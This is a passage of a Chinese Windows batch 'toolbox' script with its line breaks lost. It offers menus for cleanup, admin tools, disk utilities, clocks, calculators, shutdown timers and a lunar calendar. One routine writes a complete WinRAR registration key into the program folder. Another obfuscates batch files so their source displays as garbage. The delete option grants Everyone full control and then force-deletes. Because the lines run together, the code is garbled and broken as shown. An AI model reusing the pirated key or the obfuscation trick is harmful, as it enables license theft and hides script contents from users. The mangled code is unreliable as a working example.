exist c:\\tmp.bat del c:\\tmp.bat>nul 2>nulif exist c:\\tmp.reg reg c:\\tmp.reg>nul 2>nulecho 清理系统垃圾完成！echo 请按任意键返回pause >nulgoto _m1:cecho RAR registration data >\"C:\\Program Files\\WinRAR\\rarreg.key\"echo Federal Agency for Education >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 1000000 PC usage license >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo UID=b621cca9a84bc5deffbf >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 6412612250ffbf533df6db2dfe8ccc3aae5362c06d54762105357d >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 5e3b1489e751c76bf6e0640001014be50a52303fed29664b074145 >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 7e567d04159ad8defc3fb6edf32831fd1966f72c21c0c53c02fbbb >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 2f91cfca671d9c482b11b8ac3281cb21378e85606494da349941fa >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo e9ee328f12dc73e90b6356b921fbfb8522d6562a6a4b97e8ef6c9f >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo fb866be1e3826b5aa126a4d2bfe9336ad63003fc0e71c307fc2c60 >>\"C:\\Program Files\\WinRAR\\rarreg.key\"echo 64416495d4c55a0cc82d402110498da970812063934815d81470829275 >>\"C:\\Program Files\\WinRAR\\rarreg.key\"goto _m1:Choice4clsecho ╔┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉╗echo.┋                      ‖                        ┋echo ┋ A.注册表             ‖ O.计算机性能监测程序   ┋echo.┋ B.远程桌面连接       ‖ p.事件查看器           ┋echo ┋ C.管理控制MMC        ‖ Q.本地安全策略         ┋echo.┋ D.检查DirectX信息    ‖ R.系统配置实用程序     ┋echo ┋ E.系统医生           ‖ S.本地服务             ┋echo.┋ F.设备管理器         ‖                        ┋echo ┋ G.磁盘碎片整理程序   ‖                        ┋echo.┋ H.磁盘管理实用程序   ‖                        ┋echo ┋ I.系统组件服务       ‖                        ┋echo.┋ J.记事本             ‖                        ┋echo ┋ k.组策略             ‖                        ┋echo.┋ L.本机用户和组       ‖                        ┋echo ┋ M.ODBC数据源管理器   ‖                        ┋echo.┋ N.计算机管理         ‖_______________________ ┋echo ┋                      ‖       Y.返回菜单       ┋echo.╚┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉╝set choice4=set /p choice4=          请输入对应的按回车:IF \"%Choice4%\"==\"\" goto Choice4if /i \"%choice4%\"==\"A\" regeditif /i \"%choice4%\"==\"B\" mstscif /i \"%choice4%\"==\"C\" mmcif /i \"%choice4%\"==\"D\" dxdiagif /i \"%choice4%\"==\"E\" drwtsn32if /i \"%choice4%\"==\"F\" devmgmt.mscif /i \"%choice4%\"==\"G\" dfrg.mscif /i \"%choice4%\"==\"H\" diskmgmt.mscif /i \"%choice4%\"==\"I\" dcomcnfgif /i \"%choice4%\"==\"J\" notepadif /i \"%choice4%\"==\"K\" gpedit.mscif /i \"%choice4%\"==\"L\" lusrmgr.mscif /i \"%choice4%\"==\"M\" odbcad32if /i \"%choice4%\"==\"N\" compmgmt.mscif /i \"%choice4%\"==\"O\" perfmonif /i \"%choice4%\"==\"P\" eventvwrif /i \"%choice4%\"==\"Q\" secpol.mscif /i \"%choice4%\"==\"R\" msconfigif /i \"%choice4%\"==\"S\" services.mscif /i \"%choice4%\"==\"Y\" goto _m1goto Choice4:eset xyz=set /p xyz=  请选择盘符后回车（必须加冒号，例：e:）:if '%xyz%'=='' goto cconvert %xyz% /fs:ntfs&goto _m1goto c:dset xyz=set /p xyz=  请选择盘符后回车（必须加冒号，例：e:）:if '%xyz%'=='' goto dchkdsk %xyz% /f&goto _m1goto d:defset xyz=set /p xyz=  请选择盘符后回车（必须加冒号，例：e:）:if '%xyz%'=='' goto defdefrag %xyz% /f /skiphigh&goto _m1goto def:mbmode con cols=40 lines=5title 简易秒表echo.echo      按任意键开始计时……pause>nulset input=0:mqset /a SS=%input%%%60set /a MM=%input%/60%%60set /a HH=%input%/3600%%60set /a DD=%input%/86400clsecho.echo.echo       已过了%DD% 天 %HH% 小时 %MM% 分 %SS% 秒set /a input=%input%+1ping 127.1 -n 2 >nulgoto mq:jsqtitle 整数计算器mode con cols=40 lines=10:jsqfsclsecho.echo                计算器echo.set /p hq=  请输入计算过程：clsset /a jshx=%hq%echo.echo                计算器echo.echo       %hq%=%jshx%echo.pause>nulgoto _max:yjxsecho exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul&chcp 437>nul&graftabl 936>nulecho.echo 按任意键开始pause>nulclsecho.echo                    纯色：液晶显示器坏点检测（按任意键继续）pause>nulcolor c7pause>nulcolor 27pause>nulcolor 97pause>nulcolor e7pause>nulcolor f0pause>nulcolor 87pause>nulexit:dzzbsetlocal enabledelayedexpansion & mode con cols=54 lines=6 & color 0atitle 电子钟表for %%a in (4 1 2 1 2 1 4 2 1 2 1 2 1 2 1 2 4 2 5 2 6 2 4 2 5 1 21 4 2 1 2 5 2 3 2 8 2 4 1 7 2 1 2 1 2 1 2 5 1 5 1 8 1 4 2 4) do (  set /a cc=~cc  for /l %%i in (1,1,%%a) do (if !cc!==0 (set dgts=!dgts!　) else (set dgts=!dgts!■)))for /l %%z in (0 0 0) do (  if \"!time:~7,1!\" neq \"!sec!\" (    set \"sec=!time:~7,1!\" & set \"oc=\"    for /l %%h in (0,1,4) do (      for %%d in (0 sp 1 sp : sp 3 sp 4 sp : sp 6 sp 7) do (        if \"%%d\"==\":\" (set /a tt=%%h*5&if \"!tt:~-1!\"==\"0\" (set oc=!oc!　) else set oc=!oc!●) else (          if \"%%d\"==\"sp\" (set oc=!oc!　) else (            set \"timeP=!time: =0!\"&set /a s=!timeP:~%%d,1!*15+%%h*3            for %%o in (!s!) do set \"oc=!oc!!dgts:~%%o,3!\"))))&cls & set /p=!oc!<nul)):bdmode con cols=60 lines=4title 百度关键字搜索echo.set/p a=请输入要搜索的关键字: start http://www.baidu.com/s?wd=%a%goto _max:dzymode con: cols=62 lines=5title 读中英文(需要中英文语音库):dhsclsset dh=set /p dh=  请输入要读的中英文：mshta vbscript:createobject(\"sapi.spvoice\").speak(\"%dh%\")(window.close)goto _max:24dcolor 1f&mode con cols=50 lines=5title 自动计算24点set \"code=+ - * /\"&set n=1:begincls&echo.&echo  请输入第%n%个(0-9内的)整数,请不要在数字前加0。echo.&set /p num%n%= 请在这里输入：echo !num%n%!|findstr \"[^0-9]\">nul&&goto wrongset str=!num%n%!if \"!str:~,1!\" equ \"0\" if \"!str:~1!\" neq \"\" goto wrongif !str! gtr 9 goto wrongset num=%num% !num%n%!&set /a n+=1if %n% neq 5 goto beginset num=%num:~1%cls&echo.&echo  你输入的四个数是:%num%echo.&echo  请稍候，正在运算中...&ping /n 2 127.1>nul:againset str=&set var=1234&set /a x+=1,n=4if %x% equ 2000 cls&echo.&echo  对不起，没有算出来，或者这四个数算不出24。&pause>nul&goto _max:lpset /a a=%random%%%%n%,m=%random%%%4+1set a=!var:~%a%,1!set var=!var:%a%=!for /f \"tokens=%m% delims= \" %%i in (\"%code%\") do set b=%%i:addif %n% equ 1 set \"b=\"set str=%str%!num%a%!%b%&set /a n-=1if %n% neq 0 goto lpset /a a=%str%if %a% neq 24 goto againcls&echo.&echo  计算结果为：%str%=24pause>nul&goto _max:wrongcls&echo.&echo  输入的数不合要求，请正确输入。&ping /n 2 127.1>nul&goto begin:zzszcolor 9f & setlocal enabledelayedexpansiontitle 指针时钟(call :init):loopcls & (set /p=!strScr!!Blanks! !date! !futureTime!!Blanks!<nul)for %%i in (!PntH!,!PntM!,!PntS!) do (   for /f \"tokens=1\" %%p in (\"!PntB!\") do (set strScr=!strScr:%%i=%%p!))(call :getNextSec futureTime futureDate)(call :drawScale strScr) for %%i in (h,m,s) do (call :drawHand strScr !Hand%%i! %%i !futureTime!)(call :setPoint strScr 0 0 !PntCenter!):testSec(set datetime=%date:~0,10%%time:~0,8%)&&(set datetime=!datetime: =0!)(set futureDateTime=!futureDate:~0,10!!futureTime:~0,8!)if \"!datetime!\" geq \"!futureDateTime!\" (goto loop)(set /a past=1!futureTime:~6,2! - 1!datetime:~16,2!) && (set past=!past:-=!)if \"!futureTime:~6,2!\" equ \"00\" if \"!datetime:~16,2!\" equ \"59\" (goto testSec)if !past! gtr 1 (goto loop)goto testSecexit /b:initmsg %username% /time:60 请右键单击时钟窗口标题栏, 选择“属性”-^>“字体”选项卡,“点阵字体”,大小: 6 x 12,以得到更好的显示效果set /a \"size=19, HandS=size-2, HandM=HandS-3, HandH=HandM-3, rScale=size-1, width=2*size+1\"set /a \"indexMax=(2*size+1)*(2*size+1)\"set /a \"xStart=size, xEnd=-size, yStart=-size, yEnd=size\"set /a \"Cols=(size*2+1)*2, Lines=size*2+1+1\"(set PntCenter=◎)&(set PntH=●)&(set PntM=○)&(set PntS=·)&(set PntB=▓)(set RomanNumbers=ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩⅪⅫ)(set days=一二三四五六日一)set /a \"leftSpaces=size*2+1-13-1\" & (set Blanks=)for /l %%i in (1,1,!leftSpaces!) do (set Blanks= !Blanks!)mode con cols=!Cols! Lines=!Lines!call :math(set strScr=) for /l %%i in (1,1,!indexMax!) do (set strScr=　!strScr!)(call :creatDial strScr !PntB!)exit /b:mathset /a \"sin0=0,sin6=105,sin12=208,sin18=309,sin24=407,sin30=500,sin36=588,sin42=669,sin48=743\"set /a \"sin54=809,sin60=866,sin66=914,sin72=951,sin78=978,sin84=995,sin90=1000\"for /l %%i in (0, 6, 90) do (  set /a \"a1=180-%%i, a2=180+%%i, a3=360-%%i\"  set /a \"sin!a1!=!sin%%i!, sin!a2!=-!sin%%i!, sin!a3!=-!sin%%i!\")for /l %%i in (0, 6, 360) do (  set /a \"a4=450-%%i, a4%%=360\"  set /a \"cos%%i=sin!a4!\")exit /b:creatDialfor /l %%x in (!xStart!,-1,!xEnd!) do for /l %%y in (!yStart!,1,!yEnd!) do (  (set /a inDial=size*size-%%x*%%x-%%y*%%y+1*size) && if !inDial! geq 0 (call :setPoint %1 %%x %%y %2))(call :drawScale %1)exit /b:drawScalefor /l %%z in (0,1,11) do (   (set /a angle=%%z+1) && (set /a angle*=30)  set /a \"x=cos!angle!*rScale/sin90, y=sin!angle!*rScale/sin90\"  (set romanNum=!RomanNumbers:~%%z,1!)  (call :setPoint %1 !x! !y! !romanNum!))exit /b:drawHand(set timeC=%4)(set timeh=!timeC:~0,2!)&(set timem=!timeC:~3,2!)&(set times=!timeC:~6,2!)for %%i in (h,m,s) do if !time%%i! lss 10 (set time%%i=!time%%i:~-1!)set /a \"timeh%%=12\"set /a \"angleh=30*timeh+(timem+6)/12*6, anglem=6*timem, angles=6*times\"set /a \"xE=%2*cos!angle%3!*2/sin90, yE=%2*sin!angle%3!*2/sin90\"if \"%5\"==\"\" (call :line %1 0 0 !xE! !yE! %2 !Pnt%3!) else (call :line %1 0 0 !xE! !yE! %2 %5)exit /b:line(set x0=%2)&(set y0=%3)&(set x1=%4)&(set y1=%5)&(set /a SQLenHand=%6*%6)set /a \"steep=(y1 - y0)*(y1 - y0) - (x1 - x0)*(x1 - x0)\"if !steep! gtr 0 (  (set tt=!x0!&& set x0=!y0!&& set y0=!tt!)  (set tt=!x1!&& set x1=!y1!&& set y1=!tt!))if !x0! gtr !x1! (  (set tt=!x0!&& set x0=!x1!&& set x1=!tt!)  (set tt=!y0!&& set y0=!y1!&& set y1=!tt!))set /a \"deltax=x1-x0, twoDeltax=2*deltax\"set /a \"twoDeltay=2*(y1-y0)\" && (set twoDeltay=!twoDeltay:-=!)set /a \"eps=0, y=y0\"if !y0! lss !y1! (set yStep=1) else (set yStep=-1)for /l %%x in (!x0!,1,!x1!) do (  set /a \"SQSum=%%x*%%x+y*y\"  if !SQSum! leq !SQLenHand! (    if !steep! gtr 0 (call :setPoint %1 !y! %%x %7) else (call :setPoint %1 %%x !y! %7)  )  (set /a eps+=twoDeltay)  if !eps! gtr !deltax! (set /a \"y+=yStep, eps-=twoDeltax\"))exit /b:getNextSec(set time1=!time:~0,-3!)&(set date1=!date!)(set timeh=!time1:~0,2!)&(set timem=!time1:~3,2!)&(set times=!time1:~6,2!)(set timeY=!date1:~0,4!)&(set timeMn=!date1:~5,2!)&(set timeD=!date1:~8,2!)&(set timeDay=!date1:~-1!)for %%i in (h,m,s,Mn,D) do if !time%%i! lss 10 (set time%%i=!time%%i:~-1!)(set /a \"timeS=(timeS+1)%%60\")if !timeS! equ 0 (  (set /a \"timeM=(timeM+1)%%60\")  if !timeM! equ 0 (    (set /a \"timeH=(timeH+1)%%24\")    if !timeH! equ 0 (      (set /a \"timeD=timeD%%31+1\")      for %%i in (一,二,三,四,五,六,日) do (        if \"%%i\"==\"!timeDay!\" (set nextDay=!days:*%%i=!)&&(set nextDay=!nextDay:~0,1!)      )      (set timeDay=!nextDay!)      if !timeD! equ 1 (        (set /a \"timeMn=timeMn%%12+1\")        if !timeMn! equ 1 (set /a timeY+=1)      )    )  ))for %%i in (h,m,s,Mn,D) do if !time%%i! lss 10 (set time%%i=0!time%%i!)(set %1=!timeH!:!timeM!:!timeS!) & (set %2=!timeY!-!timeMn!-!timeD! 星期!timeDay!)exit /b:setPointset /a \"index=(xStart-%2)*width+%3-yStart+1\"set /a \"lenLeft=index-1, lenRight=indexMax-index\"for /f \"tokens=1,2,3\" %%a in (\"!lenLeft! !index! !lenRight!\") do (set %1=!%1:~0,%%a!%4!%1:~%%b,%%c!)exit /b:zlzstitle 测试你的身体质量指数(BMI)mode con: cols=60 lines=5:main_wcls&echo.set weight=[]set /p weight=  请输入体重(单位:kg): call :ie weight %weight% main_w:main_hcls&echo.set height=[]set /p height=  请输入身高(单位:cm): call :ie height %height% main_hset /a bmi=^(%weight%*10000^)/^(%height%*%height%^)call :out %bmi%:outset \"yo=if %1 equ %%a msg /v /w %username%\"if %1 gtr 30 msg /v /w %username% \" 不要再闹了！！！哪有这种身材 \">nul&goto _maxfor /l %%a in (28 1 30) do %yo% \" BMI：%bmi% 你再不减肥就完蛋了! \">nul&goto _maxfor /l %%a in (24 1 27) do %yo% \" BMI：%bmi% 你是不是胖了点? \">nul&goto _maxfor /l %%a in (21 1 23) do %yo% \" BMI：%bmi% 我敢打赌,你一定经常抢吃,不然不会偏胖! \">nul&goto _maxfor /l %%a in (19 1 20) do %yo% \" BMI：%bmi% 哇！！棒极了，是标准身材！ \">nul&goto _maxfor /l %%a in (17 1 18) do %yo% \" BMI：%bmi% 朋友，明显你营养不良(-_-)！ \">nul&goto _maxif %1 lss 17 msg /v /w %username% \" 按照生物学来说这种生物是不能生存的！ \">nul&goto _max:ieif \"%1\"==\"[]\" goto %3echo %2|findstr \"^[1-9][0-9]*$\">nul||goto %3if %2 geq 250 msg /v /w %username% \"  你输入的数字让我头都大了,按确定重新输入!\">nul&goto %3goto :eof:pcljmmode con cols=100 lines=8set \"origFile=set /p \"origFile=  请输入文件位置: set \"newFile=%~dpn1_new%~x1\"> \"%newFile%\" echo CreateObject^(\"Scripting.FileSystemObject\"^). _>>\"%newFile%\" echo CreateTextFile^(\"%newFile%\", True, vbTrue^).Write \"::(P)&(C)2010 Spring\"cscript -nologo -e:vbs \"%newFile%\">>\"%newFile%\" (echo.&echo.&echo,cls)>>\"%newFile%\" type \"%origFile%\"echo  %origFile%echo  变成乱码后的文件是echo  %newFile%ping /n 4 127.1>nulgoto _max:wlpzcall :select \"ip address\" \"ip\"call :select \"Physical Address\" \"mac\"call :select \"Default Gateway\" \"gateway\"call :select \"DNS Servers\" \"dns\"call :select \"Description\" \"netcard\"echo IP:%ip%echo MAC:%mac%echo DNS:%dns%echo GATEWAY:%gateway%echo NETCARD:%netcard%pause>nulgoto _max:selectfor /f \"tokens=2 delims=:\" %%i in ('ipconfig /all ^| findstr /i /c:%1') do if not \"!%~2!\" == \"\" set \"%~2=%%i\"goto :eof:ljjcecho for each ps in getobject _ >ps.vbsecho (\"winmgmts:\\\\.\\root\\cimv2:win32_process\").instances_ >>ps.vbsecho wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbsecho PID     图像名          程序位置>%windir%\\jc.txtecho ======  =============== ==============================================================================================================>>%windir%\\jc.txtcscript //nologo ps.vbs>>%windir%\\jc.txt & del ps.vbsjc.txtgoto _max:qlssmode con: cols=85 lines=200:wjglmtitle 当前目录：%cd%clsecho 文件管理器echo.set num=0echo  序号  文件名for /f \"tokens=*\" %%a in ('dir /b') do set /a num+=1&echo  [!num!]  %%a&set \"rmpvar=%%a\"set mem=set /p mem=请输入 打开直接输入文件名 删除【D】创建快捷方式【S】转换目录【E】关闭【C】编辑【T】：if '%mem%'=='' goto wjglmif /i '%mem%'=='D' goto deleteif /i '%mem%'=='S' goto cjkjfsif /i '%mem%'=='C' goto _maxif /i '%mem%'=='E' goto mldirif /i '%mem%'=='T' goto editwstart \"\" %mem%goto wjglm:deleteset wz=set /p wz=  请输入文件（夹）名: if '%wz%'=='' goto deleteecho y|Cacls %wz% /c  /t /p Everyone:f>nul 2>nulDEL /F/A/Q %wz% >nul 2>nulRD /S /Q \\\\?\\%wz% >nul 2>nulgoto wjglm:cjkjfsset /p fileName=      [请输入文件或者目录的全路径]:if /i \"!fileName!\"==\"\" goto :enterFileNameif not exist \"%filename%\" cls & echo 你输入的目录或者文件名不存在，请重新输入 & pause & goto :enterFileNameecho.for %%i in (\"!fileName!\") do set name=%%~niset /p shortCutPath=      [请输入将创建方式保存到的路径]:set shortCutPath=\"!shortCutPath!\\!name!.lnk\"echo Dim WshShell,Shortcut>>tmp.vbsecho Dim path,fso>>tmp.vbsecho path=\"%fileName%\">>tmp.vbsecho Set fso=CreateObject(\"Scripting.FileSystemObject\")>>tmp.vbsecho Set WshShell=WScript.CreateObject(\"WScript.Shell\")>>tmp.vbsecho Set Shortcut=WshShell.CreateShortCut(%shortCutPath%)>>tmp.vbsecho Shortcut.TargetPath=path>>tmp.vbsecho Shortcut.Save>>tmp.vbs\"%SystemRoot%\\System32\\WScript.exe\" tmp.vbsdel tmp.vbs /s /qclsif exist %shortCutPath% echo 快捷方式创建完毕... & pause>nulif not exist %shortCutPath% echo 快捷方式创建失败,请重新操作... & pause>nulgoto wjglm:mldirset xyz=set /p xyz=  请输入要转换的目录，输入..后退一个目录if '%xyz%'=='' goto mldircd %xyz%&goto wjglm:editwset mz=set /p mz=  请输入要编辑的文件if '%mz%'=='' goto editwNOTEPAD.EXE %mz%&goto wjglm:shutdownclsecho ╔┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉╗echo.┋                       ‖                       ┋echo ┋ A.定时关机            ‖ F.休眠                ┋echo.┋ B.倒计时关机          ‖ G.定时注销本机        ┋echo ┋ C.删除定时关机任务    ‖ H.定时重启本机        ┋echo.┋ D.查看定时关机任务状态‖                       ┋echo.┋ E.定时锁定本机        ‖_______________________┋echo ┋                       ‖      Y.返回菜单       ┋echo.╚┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉┉╝echo.echo. SET a=SET /P a=请输入对应的按回车:ECHO.IF /I '%a%'=='A' goto dsgjIF /I '%a%'=='B' goto djsgjIF /I '%a%'=='C' goto scdsgjIF /I '%a%'=='D' goto ckgjIF /I '%a%'=='E' goto dssdIF /I '%a%'=='G' goto dszxIF /I '%a%'=='H' goto dscqIF /I '%a%'=='F' %windir%\\system32\\rundll32.exe powrprof.dll,SetSuspendStateif /i \"%a%\"==\"Y\" goto _maxgoto shutdown:dsgjecho 请输入关机时间,(如12:00:00)set shutdowntime=set /p shutdowntime=at %shutdowntime% tsshutdn 0 /delay:0 /powerdown >nulIF not errorlevel 1 goto okecho %shutdowntime% 不是标准的时间格式,请重新输入echo.goto dsgj:okecho.echo 设定完毕! 按任意键继续...pause >nulclsgoto shutdown:djsgjecho 您想要多少秒后关机echo (若设定后要取消,单击\"确定\"后按Ctrl+C键两次)set timed=set /p timed=输入:tsshutdn %timed% /delay:0  /powerdown >nulIF not errorlevel 1 goto okecho %timed% 是无效的关机时间,请重新输入echo.goto djsgj:scdsgjat /del /yecho 定时关机任务已取消,按任意键继续...pause >nulclsgoto shutdown:ckgjatpauseclsgoto shutdown:logofflogoff:dssdecho 0 为立即锁定本机,其他数字以分钟为单位!set /p var=请输入多少分钟后锁定本机(如3): set /a var*=60:锁echo !var!秒后锁定本机! CTRL+C取消.ping /n 6 127.1>nulif !var! LEQ 0 (goto 锁定) else set /a var-=5 & goto 锁:锁定rundll32.exe user32.dll,LockWorkStation:dszxecho 0 为立即注销本机,其他数字以分钟为单位!set /p var=请输入多少分钟后注销本机(如3): set /a var*=60:注echo !var!秒后注销! CTRL+C取消.ping /n 6 127.1>nulif !var! LEQ 0 (goto 注销) else set /a var-=5 & goto 注:注销shutdown /l :dscqecho 0 为立即重启动本机,其他数字以分钟为单位!set /p var=请输入多少分钟后重启动本机(如3): set /a var*=60:重echo !var!秒后重启动! CTRL+C取消.ping /n 6 127.1>nulif !var! LEQ 0 (goto 重启动) else set /a var-=5 & goto 重:重启动shutdown /r /t 0:bsqlgmode con cols=50 lines=3set times=%time:~0,2%点%time:~3,2%分echo.echo                   %times%%time:~6,2%秒mshta vbscript:createobject(\"sapi.spvoice\").speak(\"现在是北京时间%times%\")(window.close)goto _max:bszlgotitle 整点报时钟mode con cols=20 lines=3:msadset timed=%time:~0,2%点set tims=%time:~3,2%分%time:~6,2%秒echo.echo     %timed%%tims%if '%tims%'=='00分00秒' mshta vbscript:createobject(\"sapi.spvoice\").speak(\"现在是北京时间%timed%整\")(window.close)ping 127.1 -n 2 >nulgoto msad:rlszcdset str=日一二三四五六七八九clsfor /f \"tokens=1,2,3 delims=-/: \" %%i in (\"%date%\") do (    (set sy=%%i) && (set sm=%%j) && (set sd=%%k))if not defined sd set sd=1if not defined sm set sm=%sy%&set sy=%date:~0,4%(set sy=0000%sy%) && (set sm=00%sm%) && (set sd=00%sd%)(set sy=%sy:~-4%) && (set sm=%sm:~-2%) && (set sd=%sd:~-2%)set /a y=1%sy%-10000, m=1%sm%-100, d=1%sd%-100 2>nulif %y% lss 100 (    if %y% lss 50 (set /a y+=2000) else (set /a y+=1900)    set sy=!y!)if %m% lss 13 if %d% lss 32 goto Calc:Calcset/a Q=(y-1901)/4set/a R=y-1901-4*Qset n=0for %%i in (0,31,59,90,120,151,181,212,243,273,304,334) do (set /a n+=1if %m% equ !n! set z=%%i)set /a leap=\"^!(y%%4) & ^!(^!(y%%100)) | ^!(y%%400)\"if %m% gtr 2 (if %leap% equ 0 (set /a z-=1) else (set /a z+=leap))set/a n=(140*Q+106*(R+1)+z*10+d*10)/295,H=(140*Q+106*(R+1)+z*10+d*10-295*n)/10if %h% equ 0 set h=29if %h% leq 10 (if %h% equ 10 (set h=初十) else (set h=初%h%)) else (set h=%h:~0,1%十%h:~-1%号)for /l %%i in (1,1,9) do (call set h=%%h:%%i=!str:~%%i,1!%%)set h=%h:0=%set sx=猴鸡狗猪鼠牛虎兔龙蛇马羊set tg=庚辛壬癸甲乙丙丁戊己set dz=申酉戌亥子丑寅卯辰巳午未set /a sxnum=%sy% %% 12set /a tgnum=%sy:~-1%title 农历!tg:~%tgnum%,1!!dz:~%sxnum%,1!年 生肖:!sx:~%sxnum%,1! 农历:%h%echo.正在启动，请稍后mode con: cols=38 lines=19set yy=%date:~0,4%set zg=%yy%年%date:~5,2%月%date:~8,2%日set abc=无if /i '%zg%'=='%yy%年01月01日' set abc=今天是元旦if /i '%zg%'=='%yy%年01月06日' set abc=今天是中国13亿人口日if /i '%zg%'=='%yy%年01月10日' set abc=今天是中国110宣传日if /i '%zg%'=='%yy%年02月02日' set abc=今天是世界湿地日if /i '%zg%'=='%yy%年02月04日' set abc=今天是世界抗癌症日if /i '%zg%'=='%yy%年02月10日' set abc=今天是世界气象日if /i '%zg%'=='%yy%年02月14日' set abc=今天是情人节if /i '%zg%'=='%yy%年02月21日' set abc=今天是国际母语日if /i '%zg%'=='%yy%年02月07日' set abc=今天是国际声援南非日if /i '%zg%'=='%yy%年02月29日' set abc=今天是国际罕见病日if /i '%zg%'=='%yy%年03月03日' set abc=今天是全国爱耳日if /i '%zg%'=='%yy%年03月08日' set abc=今天是妇女节if /i '%zg%'=='%yy%年03月12日' set abc=今天是植树节if /i '%zg%'=='%yy%年03月15日' set abc=今天是国际消费日if /i '%zg%'=='%yy%年03月21日' set abc=今天是世界森林日if /i '%zg%'=='%yy%年03月22日' set abc=今天是世界水日if /i '%zg%'=='%yy%年03月23日' set abc=今天是世界气象日if /i '%zg%'=='%yy%年03月24日' set abc=今天是世界防治结核病日if /i '%zg%'=='%yy%年04月01日' set abc=今天是愚人节if /i '%zg%'=='%yy%年04月07日' set abc=今天是世界卫生日if /i '%zg%'=='%yy%年04月22日' set abc=今天是世界地球日if /i '%zg%'=='%yy%年05月01日' set abc=今天是国际劳动节if /i '%zg%'=='%yy%年05月04日' set abc=今天是中国青年节if /i '%zg%'=='%yy%年05月05日' set abc=今天是全国碘缺乏病日if /i '%zg%'=='%yy%年05月08日' set abc=今天是世界红十字日if /i '%zg%'=='%yy%年05月12日' set abc=今天是国际护士节if /i '%zg%'=='%yy%年05月15日' set abc=今天是国际家庭日if /i '%zg%'=='%yy%年05月17日' set abc=今天是世界电信日if /i '%zg%'=='%yy%年05月18日' set abc=今天是国际博物馆日if /i '%zg%'=='%yy%年05月19日' set abc=今天是中国汶川地震哀挨哀悼日if /i '%zg%'=='%yy%年05月20日' set abc=今天是全国学生营养日if /i '%zg%'=='%yy%年05月22日' set abc=今天是国际生物多样性日if /i '%zg%'=='%yy%年05月31日' set abc=今天是世界无烟日if /i '%zg%'=='%yy%年06月01日' set abc=今天是国际儿童节if /i '%zg%'=='%yy%年06月05日' set abc=今天是世界环境日if /i '%zg%'=='%yy%年06月06日' set abc=今天是全国爱眼日if /i '%zg%'=='%yy%年06月17日' set abc=今天是防治荒漠化和干旱日if /i '%zg%'=='%yy%年06月23日' set abc=今天是国际奥林匹克日if /i '%zg%'=='%yy%年06月25日' set abc=今天是全国土地日if /i '%zg%'=='%yy%年06月26日' set abc=今天是国际反毒品日if /i '%zg%'=='%yy%年07月01日' set abc=今天是香港回归日、建党节if /i '%zg%'=='%yy%年07月07日' set abc=今天是抗日战争纪念日if /i '%zg%'=='%yy%年07月08日' set abc=今天是世界过敏性疾病日if /i '%zg%'=='%yy%年07月11日' set abc=今天是世界人口日if /i '%zg%'=='%yy%年07月28日' set abc=今天是制作者的生日if /i '%zg%'=='%yy%年08月01日' set abc=今天是八一建军节if /i '%zg%'=='%yy%年05月01日' set abc=今天是劳动节if /i '%zg%'=='%yy%年09月08日' set abc=今天是国际扫盲日if /i '%zg%'=='%yy%年09月10日' set abc=今天是教师节、世界预防自杀日if /i '%zg%'=='%yy%年09月16日' set abc=今天是国际臭氧层保护日if /i '%zg%'=='%yy%年09月17日' set abc=今天是国际和平日if /i '%zg%'=='%yy%年09月20日' set abc=今天是国际爱牙日if /i '%zg%'=='%yy%年09月27日' set abc=今天是世界旅游日if /i '%zg%'=='%yy%年10月01日' set abc=今天是国庆节、国际音乐节if /i '%zg%'=='%yy%年10月02日' set abc=今天是国际减轻自然灾害日if /i '%zg%'=='%yy%年10月04日' set abc=今天是世界动物日if /i '%zg%'=='%yy%年10月07日' set abc=今天是国际住房日if /i '%zg%'=='%yy%年10月08日' set abc=今天是全国高血压日、世界视觉日if /i '%zg%'=='%yy%年10月09日' set abc=今天是世界邮政日if /i '%zg%'=='%yy%年10月10日' set abc=今天是世界精神卫生日if /i '%zg%'=='%yy%年10月15日' set abc=今天是国际盲人节if /i '%zg%'=='%yy%年10月16日' set abc=今天是世界粮食节if /i '%zg%'=='%yy%年10月17日' set abc=今天是世界消除贫困日if /i '%zg%'=='%yy%年10月21日' set abc=今天是中国（揭阳）国际玉器节if /i '%zg%'=='%yy%年10月22日' set abc=今天是世界传统医药日if /i '%zg%'=='%yy%年10月24日' set abc=今天是联合国日if /i '%zg%'=='%yy%年10月25日' set abc=今天是人类天花绝迹日if /i '%zg%'=='%yy%年10月26日' set abc=今天是足球诞生日if /i '%zg%'=='%yy%年10月31日' set abc=今天是万圣节if /i '%zg%'=='%yy%年11月08日' set abc=今天是中国记者日if /i '%zg%'=='%yy%年11月09日' set abc=今天是消防宣传日if /i '%zg%'=='%yy%年11月14日' set abc=今天是世界糖尿病日if /i '%zg%'=='%yy%年11月17日' set abc=今天是国际大学生节if /i '%zg%'=='%yy%年12月01日' set abc=今天是世界艾滋病日if /i '%zg%'=='%yy%年12月03日' set abc=今天是世界残疾人日if /i '%zg%'=='%yy%年12月09日' set abc=今天是世界足球日if /i '%zg%'=='%yy%年12月20日' set abc=今天是澳门回归纪念日if /i '%zg%'=='%yy%年12月21日' set abc=今天是国际篮球日if /i '%zg%'=='%yy%年12月24日' set abc=今天是平安夜if /i '%zg%'=='%yy%年12月25日' set abc=今天是圣诞节、世界强化免疫日if /i '%zg%'=='%yy%年12月26日' set abc=今天是毛泽东诞辰set rq=set sj=set xq=set y=set r=set n=:gn---6-cfset ra=set rb=set rc=set +1=set y=%date:~5,-7%set r=%date:~8,-4%set n=%date:~0,-10%set xq=%date:~13,1%set sj=%time:~0,-9%时%time:~3,-6%分%time:~6,-3%秒if %xq%==六 (color fc&goto tgcolor) else (goto cr):crif %xq%==日 (color fc) else (color f0):tgcolorif %y% equ 01 (set yue=  一月大)if %y% equ 02 (set yue=  二月小)if %y% 